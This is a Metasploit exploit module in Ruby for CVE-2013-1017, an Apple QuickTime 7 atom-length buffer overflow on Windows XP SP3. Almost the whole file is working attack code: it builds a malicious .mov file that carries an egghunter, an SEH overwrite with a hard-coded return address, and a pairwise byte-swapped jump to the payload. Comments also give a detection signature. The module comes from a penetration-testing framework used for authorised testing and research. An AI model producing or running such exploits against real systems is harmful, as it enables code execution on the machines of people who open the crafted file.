GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::Egghunter

  # File-format module for CVE-2013-1017 (Apple QuickTime 7, 'rdrf'/'dref' atom
  # length handling in the Alis record). It writes one .mov file (datastore
  # 'FILENAME', default 'msf.mov'): a fixed atom skeleton, then a record buffer
  # carrying an egghunter and an SEH overwrite, then the egg holding the payload.
  #
  # Only the 4-byte file-size field at offset 0 is recomputed from the generated
  # data (see #exploit). Every nested atom/record size below is a hard-coded
  # literal, so any change to the layout has to be mirrored in those constants.
  #
  # Detection note: files produced here contain a 'rdrf' atom whose 4-byte size
  # field is zero, immediately followed by the 'alis' type tag.
  #
  # @param info [Hash] module metadata merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow",
        'Description' => %q{
          This module exploits a vulnerability found in Apple QuickTime. The flaw is
          triggered when QuickTime fails to properly handle the data length for certain
          atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer
          overflow by loading a specially crafted .mov file, and allows arbitrary
          code execution under the context of the current user. Please note: Since an egghunter
          is used to search for the payload, this may require additional time for
          the exploit to complete.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Jason Kratzer', # Original Discovery & PoC (overlapped finding), aka pyoor
          'Tom Gallagher', # Original Discovery (overlapped)
          'Paul Bates', # Original Discovery (overlapped)
          'sinn3r' # Metasploit
        ],
        'References' => [
          [ 'CVE', '2013-1017' ],
          [ 'OSVDB', '93625' ],
          [ 'BID', '60097' ],
          [ 'URL', 'http://support.apple.com/kb/HT5770' ],
          [ 'ZDI', '13-110' ]
        ],
        'Platform' => 'win',
        'Targets' => [
          # Ret = P/P/R in Quicktime.qtx
          # Tested on:
          # Quicktime 7.7.0
          # Quicktime 7.7.1
          # Quicktime 7.7.2
          # Quicktime 7.7.3
          # Single target: the SEH handler address is a fixed literal, so the
          # module is specific to this library build (see 'Ret' below).
          [ 'Quicktime 7.7.0 - 7.7.3 on Windows XP SP3', { 'Ret' => 0x66801042 } ]
        ],
        'Payload' => {
          'BadChars' => "\x00"
        },
        'Privileged' => false,
        'DisclosureDate' => '2013-05-22',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.', 'msf.mov']),
      ]
    )
  end

  # Reverses every 2-byte pair of +data+ and returns the result as a new String.
  #
  # The step runs from 0 to data.length inclusive; at i == data.length the slice
  # is an empty string, so nothing is appended, and an odd-length input keeps its
  # final byte unchanged. NOTE(review): presumably this compensates for 16-bit
  # byte swapping done by the target parser — not verifiable from this file.
  #
  # @param data [String] bytes to swap pairwise
  # @return [String] swapped copy; +data+ itself is not modified
  def sort_bytes(data)
    buf = ''
    0.step(data.length, 2) do |i|
      buf << data[i, 2].reverse
    end

    buf
  end

  # Assembles the .mov file and passes it to file_create.
  #
  # Steps: generate an egghunter and egg for payload.encoded (respecting the
  # payload's bad chars, with the egghunter checksum option enabled); build the
  # record buffer +buf+; append it to the fixed atom skeleton +mov+; patch the
  # leading big-endian size field with the final total length.
  #
  # @return [void]
  def exploit
    fsize = 0

    badchars = payload_badchars
    hunter, egg = generate_egghunter(payload.encoded, badchars, { :checksum => true })

    buf = ''
    buf << "\x61" * 5 # Make sure our NOPs don't cause AV
    buf << sort_bytes(make_nops(4)) # Pad 9 bytes to ensure alignment
    buf << sort_bytes(hunter) # egg huntin'
    # Assumes 9 + hunter.length <= 607; a longer hunter would make this length
    # negative — TODO confirm with the egghunter mixin's output size.
    buf << rand_text_alpha(607 - buf.length) # Offset 607 to nSEH
    buf << sort_bytes("\xeb\x06#{rand_text_alpha(2)}") # nSEH
    buf << sort_bytes([target.ret].pack("V*")) # SE Handler
    buf << sort_bytes("\xe9\x95\xfd\xff\xff\xff") # Jmp to egghunter
    buf << rand_text_alpha(50) # After SEH, only ~33 bytes
    buf << egg # Should be found somewhere else

    # Quicktime File Format Specifications:
    # https://developer.apple.com/standards/qtff-2001.pdf
    # All sizes below are fixed literals; only the leading file-size field is
    # recomputed at the end of this method.
    mov = "\x00\x00\x06\xDF" # File size (placeholder, overwritten below)
    mov << "moov" # Movie atom
    mov << "\x00\x00\x06\xD7" # size (1751d)
    mov << "rmra" # Reference Movie atom
    mov << "\x00\x00\x06\xCF" # size (1743d)
    mov << "rmda" # rmda atom
    mov << "\x00\x00\x06\xBF" # size (1727d)
    mov << "rdrf" # Data reference atom
    mov << "\x00\x00\x00\x00" # size set to 0
    mov << "alis" # Data reference type: FS alias record
    mov << "\x00\x00\x06\xAA" # Size (1706d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00\x06\x61" # Size (1633d)
    mov << rand_text_alpha(38)
    mov << "\x12"
    mov << rand_text_alpha(81)
    mov << "\xFF\xFF"
    mov << rand_text_alpha(18)
    mov << "\x00\x08" # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x08" # Size (8d)
    mov << rand_text_alpha(8)
    mov << "\x00\x00"
    mov << "\x00\x26" # Size (38d)
    mov << rand_text_alpha(38)
    mov << "\x00\x0F\x00\x0E"
    mov << "AA" # Size (must be invalid)
    mov << rand_text_alpha(12)
    mov << "\x00\x12\x00\x21"
    mov << rand_text_alpha(36)
    mov << "\x00"
    mov << "\x0F\x33"
    mov << rand_text_alpha(17)
    mov << "\x02\xF4" # Size (0x02F4 = 756d)
    mov << rand_text_alpha(756)
    mov << "\xFF\xFF\x00\x00\x00"
    fsize += mov.length
    mov << buf
    fsize += buf.length # fsize now equals mov.length

    # Replace the placeholder at offset 0 with the real total length (big-endian).
    mov[0, 4] = [fsize].pack("N")

    print_status("Creating #{datastore['FILENAME']}")
    file_create(mov)
  end
end